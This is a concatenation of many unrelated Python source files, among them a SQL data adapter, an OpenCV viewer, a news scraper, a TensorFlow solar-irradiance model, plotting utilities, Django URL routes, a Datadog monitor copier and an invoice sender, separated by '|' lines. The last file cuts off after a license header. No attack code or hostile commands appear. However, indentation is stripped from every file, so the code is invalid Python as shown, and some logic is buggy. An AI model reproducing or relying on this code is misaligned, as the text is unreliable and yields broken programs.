class SqlTargetAdapter(ConnectionTargetAdapter):
@inject
def __init__(self,
provider: SqlProvider,
):
self.provider = provider
def clear_data(self, integration: IntegrationBase) -> int:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
truncate_affected_rowcount = target_context.truncate_table(schema=integration.TargetConnections.Sql.Schema,
table=integration.TargetConnections.Sql.ObjectName)
return truncate_affected_rowcount
def prepare_insert_row(self, data, columns):
insert_rows = []
for extracted_data in data:
row = []
for column in columns:
column_data = extracted_data[column]
row.append(column_data)
insert_rows.append(tuple(row))
return insert_rows
def prepare_data(self, integration: IntegrationBase, source_data: any) -> List[any]:
columns = integration.SourceConnections.Columns
if columns is not None:
source_columns = [(column.Name) for column in columns]
elif columns is None:
source_columns = source_data[0].keys()
if isinstance(source_data, DataFrame):
data = source_data[source_columns]
prepared_data = data.values.tolist()
else:
prepared_data = self.prepare_insert_row(data=source_data, columns=source_columns)
return prepared_data
def prepare_target_query(self, integration: IntegrationBase, source_column_count: int) -> str:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
source_columns = integration.SourceConnections.Columns
target_columns = integration.TargetConnections.Columns
if integration.TargetConnections.Sql.Query is not None:
if source_columns is not None and len(source_columns) > 0:
column_rows = [(column.Name) for column in source_columns]
prepared_target_query = target_context.prepare_target_query(
column_rows=column_rows,
query=integration.TargetConnections.Sql.Query
)
else:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_values_query(
values_query=values_query,
schema=schema,
table=table
)
else:
if source_columns is not None and len(source_columns) > 0:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
target_column_rows = [column.Name for column in target_columns]
columns_query = ",".join(target_column_rows)
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_query(
columns_query=columns_query,
values_query=values_query,
schema=schema,
table=table
)
else:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_values_query(
values_query=values_query,
schema=schema,
table=table
)
return prepared_target_query
def write_target_data(self, integration: IntegrationBase, prepared_data: List[any]) -> int:
if prepared_data is not None and len(prepared_data) > 0:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
prepared_target_query = self.prepare_target_query(integration=integration,
source_column_count=len(prepared_data[0]))
affected_row_count = target_context.execute_many(query=prepared_target_query, data=prepared_data)
return affected_row_count
else:
return 0
def do_target_operation(self, integration: IntegrationBase) -> int:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
affected_rowcount = target_context.execute(query=integration.TargetConnections.Sql.Query)
return affected_rowcount
|
#!/usr/bin/env python3.5
import numpy as np
import cv2
from .data import SCALES
class cv2Window( ):
def __init__( self, name, type = cv2.WINDOW_AUTOSIZE ):
self.name = name
self.title = name
self.type = type
def __enter__( self ):
cv2.namedWindow( self.name, self.type )
return self
def __exit__( self, *args ):
cv2.destroyWindow( self.name )
def getTitle(self):
return self.title
def setTitle(self, new_title):
self.title = new_title
cv2.setWindowTitle(self.name, self.title)
def isKeyDown(self, key):
return cv2.waitKey( 1 ) & 0xFF == ord(key)
def getKey(self):
return chr(cv2.waitKey( 1 ) & 0xFF)
def show( self, mat ):
cv2.imshow( self.name, mat )
def visualizer(images, callback = None, win_title = 'Visualizer'):
quit = False
length = len(images)
i = 0
img = None
with cv2Window( win_title ) as window:
while not quit:
if type(images[i]) is np.ndarray:
img = images[i]
elif type(images[i]) is str:
img = cv2.imread(images[i])
if callback:
callback(img)
window.show(img)
key = window.getKey()
while key not in 'npq':
key = window.getKey()
if key == 'n':
i = ( i + 1 ) % length
elif key == 'p':
i = i - 1 if i > 0 else length-1
elif key == 'q':
quit = True
|
"""
===================================================
A class for VCF format
===================================================
"""
import re
class VCFHeader:
def __init__(self, hInfo = None):
self.header = {}
if hInfo and (type(hInfo) is not dict): raise ValueError ('The data type should be "dict" in class of "VCFHeader", but found %s' % str(type(hInfo)))
if hInfo: self.header = hInfo
def Add(self, mark, id, num, type, description):
key = '##%s=<ID=%s' % (mark, id)
val = '##%s=<ID=%s,Number=%d,Type=%s,Description="%s">' % (mark, id, num, type, description)
self.header[key] = val
return self
def Record(self, headline):
if re.search (r'^##fileformat', headline): tag = '###'
elif re.search (r'^#CHROM' , headline): tag = '#CHROM'
else: tag = headline.split(',')[0]
self.header[tag] = headline
class VCFInfo:
def __init__(self, info= None):
self.info = {}
if info and (type(info) is not dict): raise ValueError ('The data type should be "dict" in class of "VCFInfo", but found %s' % str(type(info)))
if info: self.info = info
def Add(self, key, context):
self.info[key] = context
return self
class VCFContext:
def __init__(self):
chrom = None
pos = None
Id = None
ref = None
alt = None
qual = None
filters= None
info = None
formats = None
sample = []
|
"""
This module provides the molior BuildOrder
relation table.
"""
from sqlalchemy import Column, Integer, ForeignKey, Table, UniqueConstraint
from .database import Base
BuildOrder = Table( # pylint: disable=invalid-name
"buildorder",
Base.metadata,
Column("build_id", Integer, ForeignKey("build.id")),
Column("sourcerepository", Integer, ForeignKey("sourcerepository.id")),
Column("dependency", Integer, ForeignKey("sourcerepository.id")),
UniqueConstraint("sourcerepository", "dependency", name="unique_buildorder"),
)
|
"""Tests for hello function."""
import pytest
def test_pythoncms():
assert 1 == 1
|
from bs4 import BeautifulSoup
from .extracter import HTMLExtracter
import streamlit as st
from transformers import pipeline
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
class Scraper:
def __init__(self):
self.base_url = 'https://google.com/search'
async def __extract_html(self, crypto_name, page_limit):
params = {
'q': 'site:coinmarketcap.com %s' % crypto_name,
'hl': 'ru-RU',
'source': 'lnms',
'tbm': 'nws',
'num': page_limit
}
extracter = HTMLExtracter(self.base_url, params)
return await extracter.extract()
def __scrap_urls(self, div):
urls = div.find_all('a', {'class': 'WlydOe'})
return [url['href'] for url in urls]
def __scrap_headings(self, div):
headings = div.find_all('div', {'role': 'heading'})
return [heading.text for heading in headings]
def __scrap_paragraphs(self, div):
summarizer = pipeline("summarization")
results = div.findAll('div', class_='sc-16r8icm-0 jKrmxw container')
text = [result.text for result in results]
ARTICLE = ' '.join(text)
ARTICLE = ARTICLE.replace('.', '.<eos>')
ARTICLE = ARTICLE.replace('?', '.<eos>')
ARTICLE = ARTICLE.replace('!', '.<eos>')
sentences = ARTICLE.split('<eos>')
max_chunk = 500
current_chunk = 0
chunks = []
for sentence in sentences:
if len(chunks) == current_chunk + 1:
if (len(chunks[current_chunk])) + len(sentence.split(' ')) <= max_chunk:
chunks[current_chunk].extend(sentence.split(' '))
else:
current_chunk += 1
chunks.append(sentence.split(' '))
else:
print(current_chunk)
chunks.append(sentence.split(' '))
for chunk_id in range(len(chunks)):
chunks[chunk_id] = ' '.join(chunks[chunk_id])
res = summarizer(chunks, max_length=120, min_length=30, do_sample=False)
paragraphs = ' '.join([summ['summary_text'] for summ in res])
# paragraphs = div.find_all('div', {'class': 'GI74Re nDgy9d'})
return [paragraph.text for paragraph in paragraphs]
async def scrap(self, crypto_name, page_limit):
html = await self.__extract_html(crypto_name, page_limit)
soup = BeautifulSoup(html, 'html.parser')
raw_news = soup.find('div', {'id': 'rso'})
if not raw_news:
return []
urls = self.__scrap_urls(raw_news)
headings = self.__scrap_headings(raw_news)
paragraphs = self.__scrap_paragraphs(raw_news)
scrapped_news = []
for index in range(page_limit):
url = urls[index]
heading = headings[index]
paragraph = paragraphs[index]
scrapped_news.append({
'url': url,
'heading': heading,
'paragraph': paragraph
})
return scrapped_news
pass
|
#!/usr/bin/env python
# CNEscualos (c) Baltasar 2016-19 MIT License <baltasarq@gmail.com>
import time
import logging
import webapp2
from model.member import Member
from model.competition import Competition
class DeleteTestCompetitionHandler(webapp2.RequestHandler):
def get(self):
# Check if the user is logged in
usr = Member.current()
if not usr or not usr.is_admin():
Member.show_error_unrecognized_usr(self)
return
try:
# Retrieve competition
competition = Competition.retrieve_competition(self)
# Retrieve test uid
str_test_uid = self.request.GET.get("test_id")
test_uid = 0
if str_test_uid:
try:
test_uid = int(str_test_uid)
except ValueError:
error_msg = "Deleting test: converting test uid: '" + str_test_uid + "'"
logging.error(error_msg)
return self.redirect("/error?msg=" + error_msg)
competition.delete_test_with_uid(test_uid)
competition.put()
time.sleep(1)
return self.redirect("/competition/modify?id=" + competition.key.urlsafe())
else:
return self.redirect("/error?msg=Not enough data deleting test in competition.")
except Exception as e:
logging.error("Deleting test in competition", str(e))
return self.redirect("/error?msg=Deleting test in competition: " + str(e))
app = webapp2.WSGIApplication([
("/competition/test/delete", DeleteTestCompetitionHandler),
], debug=True)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: hello.proto
# plugin: python-betterproto
from dataclasses import dataclass
import betterproto
@dataclass
class Greeting(betterproto.Message):
"""Greeting represents a message you can tell a user."""
message: str = betterproto.string_field(1)
|
import typing
import datetime
import tensorflow as tf
from model_logging import get_logger
from training_loop import k_to_true_ghi
class MainModel(tf.keras.Model):
TRAINING_REQUIRED = True
def __init__(
self,
stations: typing.Dict[typing.AnyStr, typing.Tuple[float, float, float]],
target_time_offsets: typing.List[datetime.timedelta],
config: typing.Dict[typing.AnyStr, typing.Any],
return_ghi_only=False
):
"""
Args:
stations: a map of station names of interest paired with their coordinates (latitude, longitude, elevation)
target_time_offsets: the list of timedeltas to predict GHIs for (by definition: [T=0, T+1h, T+3h, T+6h]).
config: configuration dictionary holding any extra parameters that might be required by the user. These
parameters are loaded automatically if the user provided a JSON file in their submission. Submitting
such a JSON file is completely optional, and this argument can be ignored if not needed.
"""
super(MainModel, self).__init__()
self.stations = stations
self.target_time_offsets = target_time_offsets
self.config = config
self.return_ghi_only = return_ghi_only
self.max_k_ghi = config["max_k_ghi"]
self.initialize()
def initialize(self):
self.logger = get_logger()
self.logger.debug("Model start")
nb_channels = self.config["nb_channels"]
image_size_m = self.config["image_size_m"]
image_size_n = self.config["image_size_n"]
input_seq_length = self.config["input_seq_length"]
self.conv3d_1 = tf.keras.layers.Conv3D(
filters=self.config["nb_feature_maps"],
kernel_size=(input_seq_length, 7, 7),
input_shape=(input_seq_length, image_size_m, image_size_n, nb_channels),
padding="valid",
strides=(1, 1, 1),
activation=None
)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.pool_1 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.conv2d_1 = tf.keras.layers.Conv2D(
filters=(2 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_2 = tf.keras.layers.BatchNormalization()
self.conv2d_2 = tf.keras.layers.Conv2D(
filters=(2 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_3 = tf.keras.layers.BatchNormalization()
self.pool_2 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.conv2d_3 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_4 = tf.keras.layers.BatchNormalization()
self.conv2d_4 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_5 = tf.keras.layers.BatchNormalization()
self.conv2d_5 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_6 = tf.keras.layers.BatchNormalization()
self.pool_3 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.flatten = tf.keras.layers.Flatten()
self.dense_1 = tf.keras.layers.Dense(
self.config["nb_dense_units"],
activation=None
)
self.bn_7 = tf.keras.layers.BatchNormalization()
self.dense_2 = tf.keras.layers.Dense(
self.config["nb_dense_units"],
activation=None
)
self.bn_8 = tf.keras.layers.BatchNormalization()
# Output layer
self.dense_3 = tf.keras.layers.Dense(
len(self.target_time_offsets),
activation=None
)
def call(self, inputs, training=False, use_image_data_only=False):
'''
Defines the forward pass through our model
inputs[0]: cropped images
inputs[1]: clearsky_GHIs
inputs[2]: true_GHIs
inputs[3]: night_flags
inputs[4]: station_id_onehot
inputs[5]: date_vector
'''
images = inputs[0]
clearsky_GHIs = inputs[1]
# Zero; We decided not to use onehot station Ids
station_id_onehot = tf.zeros(inputs[4].shape)
if use_image_data_only:
date_vector = tf.zeros(inputs[5].shape)
normalized_clearsky_GHIs = tf.zeros(inputs[1].shape)
else:
date_vector = inputs[5]
# Refer to report for mean/std choices
normalized_clearsky_GHIs = (clearsky_GHIs - 454.5) / 293.9
x = self.conv3d_1(images)
x = self.bn_1(x, training=training)
x = tf.nn.relu(x)
x = tf.squeeze(x, [1])
x = self.pool_1(x)
x = self.conv2d_1(x)
x = self.bn_2(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_2(x)
x = self.bn_3(x, training=training)
x = tf.nn.relu(x)
x = self.pool_2(x)
x = self.conv2d_3(x)
x = self.bn_4(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_4(x)
x = self.bn_5(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_5(x)
x = self.bn_6(x, training=training)
x = tf.nn.relu(x)
x = self.pool_3(x)
x = self.flatten(x)
x = tf.concat((x, station_id_onehot, normalized_clearsky_GHIs, date_vector), axis=1)
x = self.dense_1(x)
x = self.bn_7(x, training=training)
x = tf.nn.relu(x)
x = self.dense_2(x)
x = self.bn_8(x, training=training)
x = tf.nn.relu(x)
x = self.dense_3(x)
k = tf.nn.sigmoid(x)
y = k_to_true_ghi(self.max_k_ghi, k, clearsky_GHIs)
if self.return_ghi_only:
return y
return k, y
|
"""Init of the risk matrix package."""
|
import os
def local():
with open('emails.txt','r') as local_database:
return local_database.readlines()
def file():
if os.path.exists('emails.txt'):
return local()
else:
open("myfile.txt", "x")
return local()
|
# coding=utf-8
# Copyright 2022 HyperBO Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils for plots related to hyperbo."""
import matplotlib.pyplot as plt
import numpy as np
COLORS = {
'Rand': '#1f77b4',
'STBO': '#7f7f7f',
'STBOH': '#2ca02c',
'MAF': '#ff7f0e',
'MIMO': '#8c564b',
'RFGP': '#e377c2',
'H* NLL': '#d62728',
'H* KL': '#6a3d9a',
'H* NLLEUC': '#bcbd22',
'H* NLLKL': '#17becf'
}
def plot_with_upper_lower(x,
line,
lower,
upper,
color='r',
ax=None,
**plot_kwargs):
"""Plot mean and standard deviation with inputs x."""
if ax is None:
plt.figure()
ax = plt.gca()
ax.fill_between(x, lower, upper, alpha=.1, color=color)
ax.plot(x, line, color=color, **plot_kwargs)
def plot_array_mean_std(array, color, ax=None, axis=0, **plot_kwargs):
"""Plot experiment results stored in array."""
mean, std = np.mean(array, axis=axis), np.std(array, axis=axis)
x = range(1, len(mean) + 1)
plot_with_upper_lower(x, mean, mean - std, mean + std, color, ax,
**plot_kwargs)
def plot_array_median_percentile(array,
color,
ax=None,
percentile=20,
**plot_kwargs):
"""Plot experiment results stored in array."""
lower, median, upper = np.percentile(
array, [percentile, 50, 100 - percentile], axis=0)
x = range(1, len(median) + 1)
plot_with_upper_lower(x, median, lower, upper, color, ax, **plot_kwargs)
def plot_all(label2array,
ax,
logscale=True,
ylabel='Regret',
xlabel='BO Iters',
method='mean',
colors=COLORS.copy(),
**kwargs):
"""Plot all experiment results.
Args:
label2array: a dictionary with labels as keys and an array of results as
values.
ax: matplotlib.pyplot.axis.
logscale: use log scale for y axis if True.
ylabel: label for y axis.
xlabel: label for x axis.
method: plot mean and std, or median and percentile.
colors: dictionary mapping from label to color.
**kwargs: other plot arguments.
"""
assert len(label2array) <= len(
colors
), f'max number of lines to plot is {len(colors)} got {len(label2array)}'
exp_types = label2array.keys()
iteritems = []
for label in exp_types:
if label not in colors:
iteritems = zip(list(colors.values())[:len(exp_types)], exp_types)
print(f'Colors not assigned to {label}.')
break
else:
iteritems += [(colors[label], label)]
for color, label in iteritems:
if label not in label2array or label2array[label] is None:
continue
y_array = np.array(label2array[label])
if method == 'mean':
plot_array_mean_std(y_array, ax=ax, label=label, color=color, **kwargs)
elif method == 'median':
plot_array_median_percentile(
y_array, ax=ax, label=label, color=color, **kwargs)
if logscale:
ax.set_yscale('log')
ax.legend()
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
def set_violin_axis_style(ax, labels):
"""Set the style of an axis on a violin plot."""
ax.xaxis.set_tick_params(direction='out')
ax.xaxis.set_ticks_position('bottom')
ax.set_xticks(np.arange(1, len(labels) + 1))
ax.set_xticklabels(labels, rotation=45)
ax.set_xlim(0.5, len(labels) + 0.5)
def plot_summary(labels,
label2array,
xlim=100,
ylim=None,
logscale=True,
ylabel='Regret',
xlabel='BO Iters',
method='mean',
title=None,
violin_trials=None,
violin_labels=None,
figsize=(24, 6),
colors=COLORS.copy(),
axes=None,
uppercenter_legend=True,
uppercenter_legend_ncol=3,
bbox_to_anchor=(0.5, 1.1),
**kwargs):
"""Plot a summary of results with options to add violin plots on slices.
Args:
labels: list of labels to be included in the plot.
label2array: a dictionary with labels as keys and an array of results as
values.
xlim: a tuple of the new x-axis limits.
ylim: a tuple of the new y-axis limits.
logscale: use log scale for y axis if True.
ylabel: label for y axis.
xlabel: label for x axis.
method: plot mean and std, or median and percentile.
title: title of the plot.
violin_trials: list of trials to plot violin plots on slices of the figure.
violin_labels: list of lables to be included in violin plots.
figsize: a tuple describing the size of the figure.
colors: dictionary mapping from label to color.
axes: list of matplotlib.pyplot.axis objects.
uppercenter_legend: use an upper center legend if True.
uppercenter_legend_ncol: number of columns for the upper center legend.
bbox_to_anchor: bbox_to_anchor of the upper center legend.
**kwargs: other plot arguments.
"""
plt.figure(dpi=1500)
if axes is None or len(axes) < len(violin_trials) + 1:
_, axes = plt.subplots(
nrows=1, ncols=len(violin_trials) + 1, figsize=figsize)
plot_all({la: label2array.get(la, None) for la in labels},
axes[0],
logscale=logscale,
ylabel=ylabel,
xlabel=xlabel,
method=method,
colors=colors,
**kwargs)
axes[0].set_xlim(0, xlim)
if uppercenter_legend:
axes[0].legend(
loc='upper center',
bbox_to_anchor=bbox_to_anchor,
ncol=uppercenter_legend_ncol,
fancybox=True,
shadow=True)
else:
axes[0].legend()
if ylim:
axes[0].set_ylim(ylim[0], ylim[1])
if title:
axes[0].set_title(title)
if not violin_trials or not violin_labels:
return
labels = violin_labels
for i, trial in enumerate(violin_trials):
data = [np.array(label2array[la])[:, trial] for la in labels]
quartile1, medians, quartile3 = np.percentile(
np.array(data), [20, 50, 80], axis=1)
parts = axes[i + 1].violinplot(data, showmedians=False, showextrema=False)
inds = np.arange(1, len(medians) + 1)
axes[i + 1].scatter(
inds, medians, marker='o', color='white', s=30, zorder=3)
axes[i + 1].vlines(
inds, quartile1, quartile3, color='k', linestyle='-', lw=5)
for pc, la in zip(parts['bodies'], labels):
pc.set_facecolor(colors[la])
pc.set_edgecolor('black')
pc.set_alpha(1)
axes[i + 1].set_title(f'BO Iters = {trial+1}')
set_violin_axis_style(axes[i + 1], labels)
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
path('', views.profile, name='profile'),
path('login', views.login_view, name='login'),
path('logout', views.logout_view, name='logout'),
path('register', views.register, name='register'),
path('delete-profile', views.delete_profile, name='delete-profile'),
# Password reset via profile
path(
'logged_in_password_reset',
views.logged_in_password_reset,
name='logged_in_password_reset',
),
# Password reset procedure via email link
path('password_reset', views.password_reset, name='password_reset'),
path(
'password_reset/done',
auth_views.PasswordResetDoneView.as_view(
template_name='accounts/password_reset_done.html'
),
name='password_reset_done',
),
path(
'reset/<uidb64>/<token>',
auth_views.PasswordResetConfirmView.as_view(
template_name='accounts/password_reset_confirm.html'
),
name='password_reset_confirm',
),
path(
'reset/done',
auth_views.PasswordResetCompleteView.as_view(
template_name='accounts/password_reset_complete.html'
),
name='password_reset_complete',
),
]
|
from typing import Dict, Any
from enum import Enum
from indico.errors import IndicoRequestError
import time
class HTTPMethod(Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
HEAD = "HEAD"
OPTIONS = "OPTIONS"
class HTTPRequest:
def __init__(self, method: HTTPMethod, path: str, **kwargs):
self.method = method
self.path = path
self.kwargs = kwargs
def process_response(self, response):
return response
class GraphQLRequest(HTTPRequest):
def __init__(self, query: str, variables: Dict[str, Any] = None):
self.query = query
self.variables = variables
self.method = HTTPMethod.POST
self.path = "/graph/api/graphql"
@property
def kwargs(self):
return {"json": {"query": self.query, "variables": self.variables}}
def process_response(self, response):
response = super().process_response(response)
errors = response.pop("errors", [])
if errors:
extras = {"locations": [error.pop("locations", None) for error in errors]}
raise IndicoRequestError(
error="\n".join(error["message"] for error in errors),
code=400,
extras=extras,
)
return response["data"]
class PagedRequest(GraphQLRequest):
"""
To enable pagination, query must include $after as an argument
and request pageInfo
query Name(
...
$after: Int
){
items(
...
after: $after
){
items {...}
pageInfo {
endCursor
hasNextPage
}
}
}
"""
def __init__(self, query: str, variables: Dict[str, Any] = None):
variables["after"] = None
self.has_next_page = True
super().__init__(query, variables=variables)
def process_response(self, response):
response = super().process_response(response)
_pg = next(iter(response.values()))["pageInfo"]
self.has_next_page = _pg["hasNextPage"]
self.variables["after"] = _pg["endCursor"] if self.has_next_page else None
return response
class RequestChain:
previous: Any = None
result: Any = None
def requests(self):
pass
class Debouncer:
def __init__(self, max_timeout: int = 5):
self.timeout = 0
self.max_timeout = max_timeout or 5 # prevent None and 0
def backoff(self):
self.increment_timeout()
time.sleep(self.timeout)
def increment_timeout(self):
if self.timeout < self.max_timeout:
self.timeout += 1
|
#!/usr/bin/env python
from datadog import initialize, api
def initialize_dd_api(account):
options = {
'api_key': configs[account]["api_key"],
'app_key': configs[account]["app_key"]
}
initialize(**options)
class Monitor:
def __init__(self,type,query,name,message,tags,options):
self.type = type
self.query = query
self.name = name
self.message = message
self.tags = tags
self.options = options
def print_monitor(self):
print("\n\n{}".format(self.__dict__))
def create_monitor(self):
create_monitor_request = api.Monitor.create(
type = self.type,
query = self.query,
name = self.name,
message = self.message,
tags = self.tags,
options = self.options
)
return create_monitor_request
configs = {
"SOURCE_ACCOUNT" : {
"api_key" : "SOURCE_ACCOUNT_API_KEY",
"app_key" : "SOURCE_ACCOUNT_APP_KEY"
},
"DEST_ACCOUNT" : {
"api_key" : "DEST_ACCOUNT_API_KEY",
"app_key" : "DEST_ACCOUNT_APP_KEY"
}
}
initialize_dd_api("SOURCE_ACCOUNT")
monitors = api.Monitor.get_all()
initialize_dd_api("DEST_ACCOUNT")
for m in monitors:
new_monitor = Monitor(
type = m["type"],
query = m["query"],
name = m["name"],
tags = m["tags"],
options = m["options"],
message = m["message"]
)
new_monitor.print_monitor()
new_monitor.create_monitor()
del new_monitor
|
# Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example for Collaborative Deep Learning (CDL)"""
import cornac
from cornac.data import Reader
from cornac.datasets import citeulike
from cornac.eval_methods import RatioSplit
from cornac.data import TextModality
from cornac.data.text import BaseTokenizer
# CDL composes an autoencoder with matrix factorization to model item (article) texts and user-item preferences
# The necessary data can be loaded as follows
docs, item_ids = citeulike.load_text()
feedback = citeulike.load_feedback(reader=Reader(item_set=item_ids))
# Instantiate a TextModality, it makes it convenient to work with text auxiliary information
# For more details, please refer to the tutorial on how to work with auxiliary data
item_text_modality = TextModality(
corpus=docs,
ids=item_ids,
tokenizer=BaseTokenizer(stop_words="english"),
max_vocab=8000,
max_doc_freq=0.5,
)
# Define an evaluation method to split feedback into train and test sets
ratio_split = RatioSplit(
data=feedback,
test_size=0.2,
exclude_unknowns=True,
item_text=item_text_modality,
verbose=True,
seed=123,
rating_threshold=0.5,
)
# Instantiate CDL model
cdl = cornac.models.CDL(
k=50,
autoencoder_structure=[200],
max_iter=30,
lambda_u=0.1,
lambda_v=1,
lambda_w=0.1,
lambda_n=1000,
seed=123
)
# Use Recall@300 for evaluation
rec_300 = cornac.metrics.Recall(k=300)
# Put everything together into an experiment and run it
cornac.Experiment(eval_method=ratio_split, models=[cdl], metrics=[rec_300]).run()
|
from setuptools import setup, find_packages
from os import path
this_dir = path.abspath(path.dirname(__file__))
with open(path.join(this_dir, "README.md"), encoding="utf-8") as f:
long_description = f.read()
setup(
name="gretel-client",
author='Gretel Labs, Inc.',
author_email='open-source@gretel.ai',
use_scm_version=True,
setup_requires=["setuptools_scm"],
description="Python bindings for the Gretel API",
url='https://github.com/gretelai/gretel-python-client',
long_description=long_description,
long_description_content_type="text/markdown",
entry_points={"console_scripts": ["gretel=gretel_client.cli:main"]},
package_dir={"": "src"},
packages=find_packages("src"),
install_requires=[
"faker==4.1.1",
"requests>=2.24.0,<3",
"smart_open>=2.1.0,<3",
"tqdm==4.45.0",
"tenacity==6.2.0",
'dataclasses;python_version<"3.7"'
],
extras_require={
"pandas": ["pandas>=1.1.0,<1.2"],
"fpe": ["numpy", "pycryptodome==3.9.8", "dateparser==0.7.6"]
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows"
]
)
|
import json
excludeSets = ['Homelands']
with open('Old Rarities.json', 'r') as f:
# Cards include name and rarity fields
setNameToCards = json.loads(f.read())
for setName in setNameToCards:
if (setName in excludeSets):
continue
rarities = setNameToCards[setName]
with open(setName, 'r') as f:
prices = json.loads(f.read())
print('%s: %s, %s' % (setName, len(rarities), len(prices)))
|
import os
from loggers import AMC_HOLDING_DIR_PATH, linespace, prgm_end, finish, NO_FILES_IN_DIR_MSG
dir_path = f"./{AMC_HOLDING_DIR_PATH}"
fund_files = os.listdir(dir_path)
# incase of empty folder
if len(fund_files) == 0:
print(NO_FILES_IN_DIR_MSG)
exit(0)
print(f"Comparing {len(fund_files)} AMCs")
company_list = []
amc_details = {}
for c_name in fund_files:
f_path = f"{AMC_HOLDING_DIR_PATH}/{c_name}"
with open(f_path,'r') as fund_name:
c_list = [i for i in fund_name.readlines()]
amc_details[c_name] = c_list
company_list.append(set(c_list))
unique_company_list = set.union(*company_list)
print(f"No. of Unique Companies : {len(unique_company_list)}")
linespace()
result = { i : [] for i in unique_company_list } # str : []
for company_name in unique_company_list:
for amc_name in amc_details.keys():
if company_name in amc_details[amc_name]:
result[company_name].append(amc_name)
counter = 1
for cname in sorted(result.keys(),key=str.casefold):
print(f"[{counter}]. {cname}")
for amcs in result[cname]:
print(f"\t- {amcs}")
counter += 1
linespace()
prgm_end()
finish()
|
from typing import List
from collections import defaultdict
import logging
from django.conf import settings
from online_payments.billing.enums import Currency
from online_payments.billing.models import Item, PaymentMethod, Invoice, Customer
from online_payments.billing.szamlazzhu import Szamlazzhu
from payments.prices import PRODUCTS, get_product_items
logger = logging.getLogger(__name__)
def send_seat_invoice(seat):
_send_invoice(seat.appointment.billing_detail, seat.appointment.email, _get_items_for_seats([seat]))
def send_appointment_invoice(appointment):
_send_invoice(appointment.billing_detail, appointment.email, _get_items_for_seats(appointment.seats.all()))
def _get_items_for_seats(seats) -> List[Item]:
grouped_products = defaultdict(int)
for seat in seats:
grouped_products[seat.payment.product_type] += 1
items = []
for product_type, quantity in grouped_products.items():
items.extend(get_product_items(PRODUCTS[product_type], quantity))
return items
def _send_invoice(billing_detail, email, items):
customer = Customer(
name=billing_detail.company_name,
post_code=billing_detail.post_code,
city=billing_detail.city,
address=billing_detail.address_line1,
email=email,
tax_number=billing_detail.tax_number,
)
invoice = Invoice(items=items, payment_method=PaymentMethod.CREDIT_CARD, customer=customer)
szamlazzhu = Szamlazzhu(settings.SZAMLAZZHU_AGENT_KEY, Currency.HUF)
logger.info("Sending invoice to: %s", email)
szamlazzhu.send_invoice(invoice, settings.SZAMLAZZHU_INVOICE_PREFIX)
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .create_query.action import CreateQuery
from .get_query.action import GetQuery
from .run_query.action import RunQuery
|
# This file is part of Pynguin.
#
# Pynguin is free software: you can redistribute it and/or modify
